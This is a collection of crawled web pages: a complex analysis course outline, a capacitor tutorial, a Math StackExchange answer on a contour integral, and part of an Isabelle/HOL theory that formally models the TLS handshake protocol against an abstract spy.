{"ft_lang_label":"__label__en","ft_lang_prob":0.8781935,"math_prob":0.80790764,"size":1637,"snap":"2022-05-2022-21","text_gpt3_token_len":353,"char_repetition_ratio":0.100428656,"word_repetition_ratio":0.054054055,"special_character_ratio":0.19303603,"punctuation_ratio":0.14950167,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9828788,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-16T16:10:46Z\",\"WARC-Record-ID\":\"<urn:uuid:3d5d1530-a2c0-466a-8d54-ae31828219cf>\",\"Content-Length\":\"81088\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ebf8bfbf-a46d-4f0a-97ff-4d4f7552ffc8>\",\"WARC-Concurrent-To\":\"<urn:uuid:bee3dd2d-84c6-41fc-a152-7414c6c35e93>\",\"WARC-IP-Address\":\"192.0.78.12\",\"WARC-Target-URI\":\"https://bookpublisherint.wordpress.com/2019/09/27/effect-of-the-type-of-load-at-infinity-over-circular-discontinuity-in-elastic-regime-a-theoretical-review-chapter-06-current-research-in-science-and-technology-vol-1/\",\"WARC-Payload-Digest\":\"sha1:6TQF5U3HDTV7PZOUMO77ZNLUTAPCYG2J\",\"WARC-Block-Digest\":\"sha1:OMPP4EYDU5RE4A7SJQVZ7XSZANTMEZUV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662510138.6_warc_CC-MAIN-20220516140911-20220516170911-00728.warc.gz\"}"}
https://math.byu.edu/wiki/index.php?title=Math_352:_Introduction_to_Complex_Analysis&oldid=2067
[ "# Math 352: Introduction to Complex Analysis\n\n### Title\n\nIntroduction to Complex Analysis.\n\n(3:3:0)\n\nF, W\n\n### Prerequisite\n\nMath 290, and either Math 341 or concurrent enrollment.\n\n### Description\n\nComplex algebra, analytic functions, integration in the complex plane, infinite series, theory of residues, conformal mapping.\n\n## Desired Learning Outcomes\n\nThis course is aimed at undergraduates majoring in mathematical and physical sciences and engineering. In addition to being an important branch of mathematics in its own right, complex analysis is an important tool for differential equations (ordinary and partial), algebraic geometry and number theory. Thus it is a core requirement for all mathematics majors. It contributes to all the expected learning outcomes of the Mathematics BS (see ).\n\n### Prerequisites\n\nStudents are expected to have completed and mastered Math 290, and to have taken or to have concurrent enrollment in Math 341 (Theory of Analysis) to provide the necessary understanding of the modes of thought of mathematical analysis.\n\n### Minimal learning outcomes\n\nStudents should achieve mastery of the topics listed below. This means that they should know all relevant definitions, the full statements of the major theorems, and examples of the various concepts. Further, students should be able to solve non-trivial problems related to these concepts, and prove simple theorems in analogy to proofs given by the instructor.\n\n1. Complex numbers, moduli, exponential form, arguments of products and quotients, roots of complex numbers, regions in the complex plane.\n2. Limits, including those involving the point at infinity. Open, closed and connected sets. Continuity, derivatives.\n3. Analytic functions, Cauchy-Riemann equations, harmonic functions, finding the harmonic conjugate.\n4. Elementary functions in the complex plane: exponential and log functions, complex exponents, trigonometric and hyperbolic functions and their inverses.\n5. Contour integrals, upper bounds for moduli, primitives, Cauchy-Goursat theorem, Cauchy integral formulae, Liouville theorem, maximum modulus theorem.\n6. Taylor series, Laurent series, integration and differentiation of power series, uniqueness of series representation, multiplication and division of power series.\n7. Isolated singularities, behavior near a singularity. Residue theorem, its application to improper integrals, Jordan's lemma. Argument principle, Rouche's theorem.\n8. Conformal mappings. Moebius transformations.\n\n### Textbooks\n\nPossible textbooks for this course include (but are not limited to):" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8906252,"math_prob":0.8517704,"size":2989,"snap":"2020-10-2020-16","text_gpt3_token_len":592,"char_repetition_ratio":0.11021776,"word_repetition_ratio":0.0,"special_character_ratio":0.18367347,"punctuation_ratio":0.15524194,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9944536,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-17T06:06:50Z\",\"WARC-Record-ID\":\"<urn:uuid:b77c4c1b-82a6-485d-b29e-072a3e7bef60>\",\"Content-Length\":\"20678\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a93032b8-1cf3-43b3-9dae-5ad1323c284c>\",\"WARC-Concurrent-To\":\"<urn:uuid:1c4e3828-bd6d-46c4-a1a6-618aef2df546>\",\"WARC-IP-Address\":\"128.187.40.23\",\"WARC-Target-URI\":\"https://math.byu.edu/wiki/index.php?title=Math_352:_Introduction_to_Complex_Analysis&oldid=2067\",\"WARC-Payload-Digest\":\"sha1:64KRQXF7FNXDRF7QOWQCQCLI6223IZSH\",\"WARC-Block-Digest\":\"sha1:NMIQCIJIXGGSFGRJY653WPCV5AOE4B6C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875141749.3_warc_CC-MAIN-20200217055517-20200217085517-00112.warc.gz\"}"}
https://www.electrical4u.net/electrical-basic/capacitance-capacitor-series-parallel-connection/
[ "# What is Capacitance, Capacitor Series and Parallel Connection\n\n## Capacitance:\n\nThe measured value of capacitor is called capacitance. The exact definition is the ability of a capacitor to store electric charge is measured. It is same like in resistor’s value as resistance, inductor value as inductance and capacitor value as capacitance.\n\nCapacitance can be mathematically expressed by", null, "Also, it is defined as the ratio of charge stored by capacitor to voltage V across the same capacitor.\n\nNote: When the voltage across the capacitor or the capacitor voltage reaches or equal to source voltage means capacitor does not charge. No charge flows.\n\nThe unit of capacitance is Farad (F). To Honor Sir Michal Faraday (the inventor of most popular electrical law of electromagnetic induction), the unit of capacitor is named in Farad. Actually, one Farad is very large unit which means the size of the capacitor comes very bigger and most capacitors are rated in micro Farad (uF= 1 x 10-6) or micro farad (pF) or Pico Farad (pF) 1 pF = 1 x 10-12F\n\nIf Q=1 coulomb and V=1 volt, then capacitance is 1F. That’s we can say that 1 Farad is equal to 1 Coulombs/1volt.\n\nOne Farad is defined as the capacitance of a capacitor between the plates of which there appears a potential difference of I volt when it is charged by 1 coulomb of electricity.\n\n### How to calculate capacitance value for two parallel plates capacitor:", null, "Let us consider a parallel plate capacitor in which the upper and lower plates are separated by some distance of d meters. There is a potential difference of V volts between the two plates, therefore work required in transferring coulomb of charge from one plate to another is V Joules; since the work is the product of force and distance d the force experienced by the charge is the electric field strength E is given by ..", null, "The electric flux density D is given by", null, "The relation between electric flux density and electric field in terminals is given by", null, "The parallel plate capacitor", null, "Here the relative permeability of the material vary according to the type of dielectric material is used to construct a capacitor.\n\n### Energy stored in a capacitor:\n\nCapacitor stores energy in the form of electric field. Work has to be done in transferring the charge from one plate to another. Let the potential difference between the plates be V and the charge on the capacitor be q. Then, the work done in moving coulomb of charge from one plate to another plate is V. If dq is the additional charge transferred to the plate, then work done is", null, "### Capacitors in series connection:", null, "If you connect four capacitors C1,C2,C3 and C4 in series connection…the resultant capacitance value is", null, "The reciprocal of equivalent capacitance value is equal to sum of all reciprocal of individual capacitance value .It is opposite of inductance and resistance are in series connection.\n\n### Key Points:\n\nIf you connect capacitor in series the resultant capacitance value comes lesser than the previous value. If you want to reduce the total capacitance value you can add a capacitor in series connection with existing.\n\n### Capacitor in parallel connection", null, "", null, "" ]
[ null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20511%20211'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20552%20411'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20416%2085'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20394%2082'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20615%20459'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20556%20118'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20459%20211'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20329%20239'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20306%2094'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20308%20253'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20259%2053'%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90168196,"math_prob":0.9755964,"size":3465,"snap":"2023-40-2023-50","text_gpt3_token_len":761,"char_repetition_ratio":0.1895406,"word_repetition_ratio":0.043327555,"special_character_ratio":0.1988456,"punctuation_ratio":0.07800312,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9952482,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T15:09:44Z\",\"WARC-Record-ID\":\"<urn:uuid:642f2a34-9477-4cb2-a43d-713b9644d43b>\",\"Content-Length\":\"143160\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:41b28d91-f71a-4bbe-8e77-d6e7866c12d9>\",\"WARC-Concurrent-To\":\"<urn:uuid:3a9e2b9d-37e8-4895-8e86-23c12ff1af31>\",\"WARC-IP-Address\":\"3.210.81.252\",\"WARC-Target-URI\":\"https://www.electrical4u.net/electrical-basic/capacitance-capacitor-series-parallel-connection/\",\"WARC-Payload-Digest\":\"sha1:SXTROQIHUBDHIZUSJNBPIGZ42R34WC2Y\",\"WARC-Block-Digest\":\"sha1:YWO4FESC57XXTMIPE5WFAZY2WDNHXMCR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506646.94_warc_CC-MAIN-20230924123403-20230924153403-00045.warc.gz\"}"}
https://math.stackexchange.com/questions/4036164/integrating-log-ix-exp-ix-x2
[ "Integrating $\\log(-ix)\\exp(-ix)/x^2$\n\nI would like to compute a few integrals like $$\\int_{-\\infty}^\\infty\\frac{\\log(-ix)\\exp(-ix)}{x^2}\\,dx$$ To be clear, here the path of integration is really $$z = \\epsilon i + x$$, so that it avoids the singularity at $$x=0$$, and the branch cut of $$\\log$$. This expression is \"well-behaved\" in several ways: it falls off faster than $$1/x^{3/2}$$ on the real line, so it converges decently quickly; in fact, falls off quickly everywhere in the lower half-plane of $$z$$. Exponentially quickly, thanks to the $$\\exp$$ term. The function is holomorphic everywhere except the branch cut at $$x\\le 0$$, so I can deform it pretty easily.\n\nThe $$\\log \\exp / x^k$$ form seems impossible to find an antiderivative for. So this seems like something that should be doable using Cauchy residue theorem and related tricks. The function grows quickly on the upper half plane, so I can't just deform it \"up and away\" and show that it's zero. One can easily reduce it to a keyhole contour around the branch cut, but neither the \"along the cut\" nor the \"around the pole\" term are zero, they both depend on the radius of the keyhole, and neither one seems solvable analytically.\n\nAnyone have tricks to tackle this?\n\n• So what is your question in one senctence? Feb 22 '21 at 23:47\n• How do I evaluate this integral? Feb 22 '21 at 23:49\n• If by \"one line\" you mean going up and down the branch cut, yes, that's what I meant by \"keyhole\". I might've misused the term. I don't see how splitting the log helps, other than that it (confusingly) means we have to use a branch cut in a nonstandard location. Feb 22 '21 at 23:53\n• Do we mean the same line $[-\\infty+i\\varepsilon,\\infty+i\\varepsilon]$? Feb 22 '21 at 23:55\n• No, it's about -2.65643. Feb 23 '21 at 0:16\n\nAssuming $$\\epsilon>0$$, the given integral, after the substitution $$-ix=z$$, is $$i\\int_{\\epsilon-i\\infty}^{\\epsilon+i\\infty}z^{-2}e^z\\log z\\,dz=-if'(2),\\qquad f(s)=\\int_{\\epsilon-i\\infty}^{\\epsilon+i\\infty}z^{-s}e^z\\,dz=\\frac{2\\pi i}{\\Gamma(s)}$$ (the last equality is basically Hankel's integral). The final result is then $$\\color{blue}{-2\\pi(1-\\gamma)}$$." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9391129,"math_prob":0.9976758,"size":1181,"snap":"2022-05-2022-21","text_gpt3_token_len":307,"char_repetition_ratio":0.096006796,"word_repetition_ratio":0.0,"special_character_ratio":0.2531753,"punctuation_ratio":0.09663866,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99944526,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-20T14:56:28Z\",\"WARC-Record-ID\":\"<urn:uuid:ab6e33d7-0140-46ef-9f56-705b560c2e19>\",\"Content-Length\":\"143081\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:56785a58-b452-4494-aa43-9e2f389107af>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ef82a2c-2fb5-4598-96d6-0f2dc92bbcce>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/4036164/integrating-log-ix-exp-ix-x2\",\"WARC-Payload-Digest\":\"sha1:64GJMS72JB6OAWIRVZPDPE6FQUUM6ZU4\",\"WARC-Block-Digest\":\"sha1:IVSMMLKVRYH553N5OYTH2Z6QKLRSA5LL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320301863.7_warc_CC-MAIN-20220120130236-20220120160236-00506.warc.gz\"}"}
http://isabelle.in.tum.de/repos/isabelle/file/91500c024c7f/src/HOL/Auth/TLS.thy
[ "src/HOL/Auth/TLS.thy\n author wenzelm Tue Sep 26 20:54:40 2017 +0200 (23 months ago) changeset 66695 91500c024c7f parent 66453 cc19f7ca2ed6 child 67443 3abf6a722518 permissions -rw-r--r--\ntuned;\n``` 1 (* Title: HOL/Auth/TLS.thy\n```\n``` 2 Author: Lawrence C Paulson, Cambridge University Computer Laboratory\n```\n``` 3 Copyright 1997 University of Cambridge\n```\n``` 4\n```\n``` 5 Inductive relation \"tls\" for the TLS (Transport Layer Security) protocol.\n```\n``` 6 This protocol is essentially the same as SSL 3.0.\n```\n``` 7\n```\n``` 8 Abstracted from \"The TLS Protocol, Version 1.0\" by Tim Dierks and Christopher\n```\n``` 9 Allen, Transport Layer Security Working Group, 21 May 1997,\n```\n``` 10 INTERNET-DRAFT draft-ietf-tls-protocol-03.txt. Section numbers below refer\n```\n``` 11 to that memo.\n```\n``` 12\n```\n``` 13 An RSA cryptosystem is assumed, and X.509v3 certificates are abstracted down\n```\n``` 14 to the trivial form {A, publicKey(A)}privateKey(Server), where Server is a\n```\n``` 15 global signing authority.\n```\n``` 16\n```\n``` 17 A is the client and B is the server, not to be confused with the constant\n```\n``` 18 Server, who is in charge of all public keys.\n```\n``` 19\n```\n``` 20 The model assumes that no fraudulent certificates are present, but it does\n```\n``` 21 assume that some private keys are to the spy.\n```\n``` 22\n```\n``` 23 REMARK. The event \"Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace>\" appears in ClientKeyExch,\n```\n``` 24 CertVerify, ClientFinished to record that A knows M. It is a note from A to\n```\n``` 25 herself. Nobody else can see it. In ClientKeyExch, the Spy can substitute\n```\n``` 26 his own certificate for A's, but he cannot replace A's note by one for himself.\n```\n``` 27\n```\n``` 28 The Note event avoids a weakness in the public-key model. Each\n```\n``` 29 agent's state is recorded as the trace of messages. When the true client (A)\n```\n``` 30 invents PMS, he encrypts PMS with B's public key before sending it. The model\n```\n``` 31 does not distinguish the original occurrence of such a message from a replay.\n```\n``` 32 In the shared-key model, the ability to encrypt implies the ability to\n```\n``` 33 decrypt, so the problem does not arise.\n```\n``` 34\n```\n``` 35 Proofs would be simpler if ClientKeyExch included A's name within\n```\n``` 36 Crypt KB (Nonce PMS). As things stand, there is much overlap between proofs\n```\n``` 37 about that message (which B receives) and the stronger event\n```\n``` 38 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace>.\n```\n``` 39 *)\n```\n``` 40\n```\n``` 41 section\\<open>The TLS Protocol: Transport Layer Security\\<close>\n```\n``` 42\n```\n``` 43 theory TLS imports Public \"HOL-Library.Nat_Bijection\" begin\n```\n``` 44\n```\n``` 45 definition certificate :: \"[agent,key] => msg\" where\n```\n``` 46 \"certificate A KA == Crypt (priSK Server) \\<lbrace>Agent A, Key KA\\<rbrace>\"\n```\n``` 47\n```\n``` 48 text\\<open>TLS apparently does not require separate keypairs for encryption and\n```\n``` 49 signature. Therefore, we formalize signature as encryption using the\n```\n``` 50 private encryption key.\\<close>\n```\n``` 51\n```\n``` 52 datatype role = ClientRole | ServerRole\n```\n``` 53\n```\n``` 54 consts\n```\n``` 55 (*Pseudo-random function of Section 5*)\n```\n``` 56 PRF :: \"nat*nat*nat => nat\"\n```\n``` 57\n```\n``` 58 (*Client, server write keys are generated uniformly by function sessionK\n```\n``` 59 to avoid duplicating their properties. They are distinguished by a\n```\n``` 60 tag (not a bool, to avoid the peculiarities of if-and-only-if).\n```\n``` 61 Session keys implicitly include MAC secrets.*)\n```\n``` 62 sessionK :: \"(nat*nat*nat) * role => key\"\n```\n``` 63\n```\n``` 64 abbreviation\n```\n``` 65 clientK :: \"nat*nat*nat => key\" where\n```\n``` 66 \"clientK X == sessionK(X, ClientRole)\"\n```\n``` 67\n```\n``` 68 abbreviation\n```\n``` 69 serverK :: \"nat*nat*nat => key\" where\n```\n``` 70 \"serverK X == sessionK(X, ServerRole)\"\n```\n``` 71\n```\n``` 72\n```\n``` 73 specification (PRF)\n```\n``` 74 inj_PRF: \"inj PRF\"\n```\n``` 75 \\<comment>\\<open>the pseudo-random function is collision-free\\<close>\n```\n``` 76 apply (rule exI [of _ \"%(x,y,z). prod_encode(x, prod_encode(y,z))\"])\n```\n``` 77 apply (simp add: inj_on_def prod_encode_eq)\n```\n``` 78 done\n```\n``` 79\n```\n``` 80 specification (sessionK)\n```\n``` 81 inj_sessionK: \"inj sessionK\"\n```\n``` 82 \\<comment>\\<open>sessionK is collision-free; also, no clientK clashes with any serverK.\\<close>\n```\n``` 83 apply (rule exI [of _\n```\n``` 84 \"%((x,y,z), r). prod_encode(case_role 0 1 r,\n```\n``` 85 prod_encode(x, prod_encode(y,z)))\"])\n```\n``` 86 apply (simp add: inj_on_def prod_encode_eq split: role.split)\n```\n``` 87 done\n```\n``` 88\n```\n``` 89 axiomatization where\n```\n``` 90 \\<comment>\\<open>sessionK makes symmetric keys\\<close>\n```\n``` 91 isSym_sessionK: \"sessionK nonces \\<in> symKeys\" and\n```\n``` 92\n```\n``` 93 \\<comment>\\<open>sessionK never clashes with a long-term symmetric key\n```\n``` 94 (they don't exist in TLS anyway)\\<close>\n```\n``` 95 sessionK_neq_shrK [iff]: \"sessionK nonces \\<noteq> shrK A\"\n```\n``` 96\n```\n``` 97\n```\n``` 98 inductive_set tls :: \"event list set\"\n```\n``` 99 where\n```\n``` 100 Nil: \\<comment>\\<open>The initial, empty trace\\<close>\n```\n``` 101 \"[] \\<in> tls\"\n```\n``` 102\n```\n``` 103 | Fake: \\<comment>\\<open>The Spy may say anything he can say. The sender field is correct,\n```\n``` 104 but agents don't use that information.\\<close>\n```\n``` 105 \"[| evsf \\<in> tls; X \\<in> synth (analz (spies evsf)) |]\n```\n``` 106 ==> Says Spy B X # evsf \\<in> tls\"\n```\n``` 107\n```\n``` 108 | SpyKeys: \\<comment>\\<open>The spy may apply @{term PRF} and @{term sessionK}\n```\n``` 109 to available nonces\\<close>\n```\n``` 110 \"[| evsSK \\<in> tls;\n```\n``` 111 {Nonce NA, Nonce NB, Nonce M} <= analz (spies evsSK) |]\n```\n``` 112 ==> Notes Spy \\<lbrace> Nonce (PRF(M,NA,NB)),\n```\n``` 113 Key (sessionK((NA,NB,M),role))\\<rbrace> # evsSK \\<in> tls\"\n```\n``` 114\n```\n``` 115 | ClientHello:\n```\n``` 116 \\<comment>\\<open>(7.4.1.2)\n```\n``` 117 PA represents \\<open>CLIENT_VERSION\\<close>, \\<open>CIPHER_SUITES\\<close> and \\<open>COMPRESSION_METHODS\\<close>.\n```\n``` 118 It is uninterpreted but will be confirmed in the FINISHED messages.\n```\n``` 119 NA is CLIENT RANDOM, while SID is \\<open>SESSION_ID\\<close>.\n```\n``` 120 UNIX TIME is omitted because the protocol doesn't use it.\n```\n``` 121 May assume @{term \"NA \\<notin> range PRF\"} because CLIENT RANDOM is\n```\n``` 122 28 bytes while MASTER SECRET is 48 bytes\\<close>\n```\n``` 123 \"[| evsCH \\<in> tls; Nonce NA \\<notin> used evsCH; NA \\<notin> range PRF |]\n```\n``` 124 ==> Says A B \\<lbrace>Agent A, Nonce NA, Number SID, Number PA\\<rbrace>\n```\n``` 125 # evsCH \\<in> tls\"\n```\n``` 126\n```\n``` 127 | ServerHello:\n```\n``` 128 \\<comment>\\<open>7.4.1.3 of the TLS Internet-Draft\n```\n``` 129 PB represents \\<open>CLIENT_VERSION\\<close>, \\<open>CIPHER_SUITE\\<close> and \\<open>COMPRESSION_METHOD\\<close>.\n```\n``` 130 SERVER CERTIFICATE (7.4.2) is always present.\n```\n``` 131 \\<open>CERTIFICATE_REQUEST\\<close> (7.4.4) is implied.\\<close>\n```\n``` 132 \"[| evsSH \\<in> tls; Nonce NB \\<notin> used evsSH; NB \\<notin> range PRF;\n```\n``` 133 Says A' B \\<lbrace>Agent A, Nonce NA, Number SID, Number PA\\<rbrace>\n```\n``` 134 \\<in> set evsSH |]\n```\n``` 135 ==> Says B A \\<lbrace>Nonce NB, Number SID, Number PB\\<rbrace> # evsSH \\<in> tls\"\n```\n``` 136\n```\n``` 137 | Certificate:\n```\n``` 138 \\<comment>\\<open>SERVER (7.4.2) or CLIENT (7.4.6) CERTIFICATE.\\<close>\n```\n``` 139 \"evsC \\<in> tls ==> Says B A (certificate B (pubK B)) # evsC \\<in> tls\"\n```\n``` 140\n```\n``` 141 | ClientKeyExch:\n```\n``` 142 \\<comment>\\<open>CLIENT KEY EXCHANGE (7.4.7).\n```\n``` 143 The client, A, chooses PMS, the PREMASTER SECRET.\n```\n``` 144 She encrypts PMS using the supplied KB, which ought to be pubK B.\n```\n``` 145 We assume @{term \"PMS \\<notin> range PRF\"} because a clash betweem the PMS\n```\n``` 146 and another MASTER SECRET is highly unlikely (even though\n```\n``` 147 both items have the same length, 48 bytes).\n```\n``` 148 The Note event records in the trace that she knows PMS\n```\n``` 149 (see REMARK at top).\\<close>\n```\n``` 150 \"[| evsCX \\<in> tls; Nonce PMS \\<notin> used evsCX; PMS \\<notin> range PRF;\n```\n``` 151 Says B' A (certificate B KB) \\<in> set evsCX |]\n```\n``` 152 ==> Says A B (Crypt KB (Nonce PMS))\n```\n``` 153 # Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace>\n```\n``` 154 # evsCX \\<in> tls\"\n```\n``` 155\n```\n``` 156 | CertVerify:\n```\n``` 157 \\<comment>\\<open>The optional Certificate Verify (7.4.8) message contains the\n```\n``` 158 specific components listed in the security analysis, F.1.1.2.\n```\n``` 159 It adds the pre-master-secret, which is also essential!\n```\n``` 160 Checking the signature, which is the only use of A's certificate,\n```\n``` 161 assures B of A's presence\\<close>\n```\n``` 162 \"[| evsCV \\<in> tls;\n```\n``` 163 Says B' A \\<lbrace>Nonce NB, Number SID, Number PB\\<rbrace> \\<in> set evsCV;\n```\n``` 164 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evsCV |]\n```\n``` 165 ==> Says A B (Crypt (priK A) (Hash\\<lbrace>Nonce NB, Agent B, Nonce PMS\\<rbrace>))\n```\n``` 166 # evsCV \\<in> tls\"\n```\n``` 167\n```\n``` 168 \\<comment>\\<open>Finally come the FINISHED messages (7.4.8), confirming PA and PB\n```\n``` 169 among other things. The master-secret is PRF(PMS,NA,NB).\n```\n``` 170 Either party may send its message first.\\<close>\n```\n``` 171\n```\n``` 172 | ClientFinished:\n```\n``` 173 \\<comment>\\<open>The occurrence of \\<open>Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace>\\<close> stops the\n```\n``` 174 rule's applying when the Spy has satisfied the \\<open>Says A B\\<close> by\n```\n``` 175 repaying messages sent by the true client; in that case, the\n```\n``` 176 Spy does not know PMS and could not send ClientFinished. One\n```\n``` 177 could simply put @{term \"A\\<noteq>Spy\"} into the rule, but one should not\n```\n``` 178 expect the spy to be well-behaved.\\<close>\n```\n``` 179 \"[| evsCF \\<in> tls;\n```\n``` 180 Says A B \\<lbrace>Agent A, Nonce NA, Number SID, Number PA\\<rbrace>\n```\n``` 181 \\<in> set evsCF;\n```\n``` 182 Says B' A \\<lbrace>Nonce NB, Number SID, Number PB\\<rbrace> \\<in> set evsCF;\n```\n``` 183 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evsCF;\n```\n``` 184 M = PRF(PMS,NA,NB) |]\n```\n``` 185 ==> Says A B (Crypt (clientK(NA,NB,M))\n```\n``` 186 (Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 187 Nonce NA, Number PA, Agent A,\n```\n``` 188 Nonce NB, Number PB, Agent B\\<rbrace>))\n```\n``` 189 # evsCF \\<in> tls\"\n```\n``` 190\n```\n``` 191 | ServerFinished:\n```\n``` 192 \\<comment>\\<open>Keeping A' and A'' distinct means B cannot even check that the\n```\n``` 193 two messages originate from the same source.\\<close>\n```\n``` 194 \"[| evsSF \\<in> tls;\n```\n``` 195 Says A' B \\<lbrace>Agent A, Nonce NA, Number SID, Number PA\\<rbrace>\n```\n``` 196 \\<in> set evsSF;\n```\n``` 197 Says B A \\<lbrace>Nonce NB, Number SID, Number PB\\<rbrace> \\<in> set evsSF;\n```\n``` 198 Says A'' B (Crypt (pubK B) (Nonce PMS)) \\<in> set evsSF;\n```\n``` 199 M = PRF(PMS,NA,NB) |]\n```\n``` 200 ==> Says B A (Crypt (serverK(NA,NB,M))\n```\n``` 201 (Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 202 Nonce NA, Number PA, Agent A,\n```\n``` 203 Nonce NB, Number PB, Agent B\\<rbrace>))\n```\n``` 204 # evsSF \\<in> tls\"\n```\n``` 205\n```\n``` 206 | ClientAccepts:\n```\n``` 207 \\<comment>\\<open>Having transmitted ClientFinished and received an identical\n```\n``` 208 message encrypted with serverK, the client stores the parameters\n```\n``` 209 needed to resume this session. The \"Notes A ...\" premise is\n```\n``` 210 used to prove \\<open>Notes_master_imp_Crypt_PMS\\<close>.\\<close>\n```\n``` 211 \"[| evsCA \\<in> tls;\n```\n``` 212 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evsCA;\n```\n``` 213 M = PRF(PMS,NA,NB);\n```\n``` 214 X = Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 215 Nonce NA, Number PA, Agent A,\n```\n``` 216 Nonce NB, Number PB, Agent B\\<rbrace>;\n```\n``` 217 Says A B (Crypt (clientK(NA,NB,M)) X) \\<in> set evsCA;\n```\n``` 218 Says B' A (Crypt (serverK(NA,NB,M)) X) \\<in> set evsCA |]\n```\n``` 219 ==>\n```\n``` 220 Notes A \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> # evsCA \\<in> tls\"\n```\n``` 221\n```\n``` 222 | ServerAccepts:\n```\n``` 223 \\<comment>\\<open>Having transmitted ServerFinished and received an identical\n```\n``` 224 message encrypted with clientK, the server stores the parameters\n```\n``` 225 needed to resume this session. The \"Says A'' B ...\" premise is\n```\n``` 226 used to prove \\<open>Notes_master_imp_Crypt_PMS\\<close>.\\<close>\n```\n``` 227 \"[| evsSA \\<in> tls;\n```\n``` 228 A \\<noteq> B;\n```\n``` 229 Says A'' B (Crypt (pubK B) (Nonce PMS)) \\<in> set evsSA;\n```\n``` 230 M = PRF(PMS,NA,NB);\n```\n``` 231 X = Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 232 Nonce NA, Number PA, Agent A,\n```\n``` 233 Nonce NB, Number PB, Agent B\\<rbrace>;\n```\n``` 234 Says B A (Crypt (serverK(NA,NB,M)) X) \\<in> set evsSA;\n```\n``` 235 Says A' B (Crypt (clientK(NA,NB,M)) X) \\<in> set evsSA |]\n```\n``` 236 ==>\n```\n``` 237 Notes B \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> # evsSA \\<in> tls\"\n```\n``` 238\n```\n``` 239 | ClientResume:\n```\n``` 240 \\<comment>\\<open>If A recalls the \\<open>SESSION_ID\\<close>, then she sends a FINISHED\n```\n``` 241 message using the new nonces and stored MASTER SECRET.\\<close>\n```\n``` 242 \"[| evsCR \\<in> tls;\n```\n``` 243 Says A B \\<lbrace>Agent A, Nonce NA, Number SID, Number PA\\<rbrace>: set evsCR;\n```\n``` 244 Says B' A \\<lbrace>Nonce NB, Number SID, Number PB\\<rbrace> \\<in> set evsCR;\n```\n``` 245 Notes A \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> \\<in> set evsCR 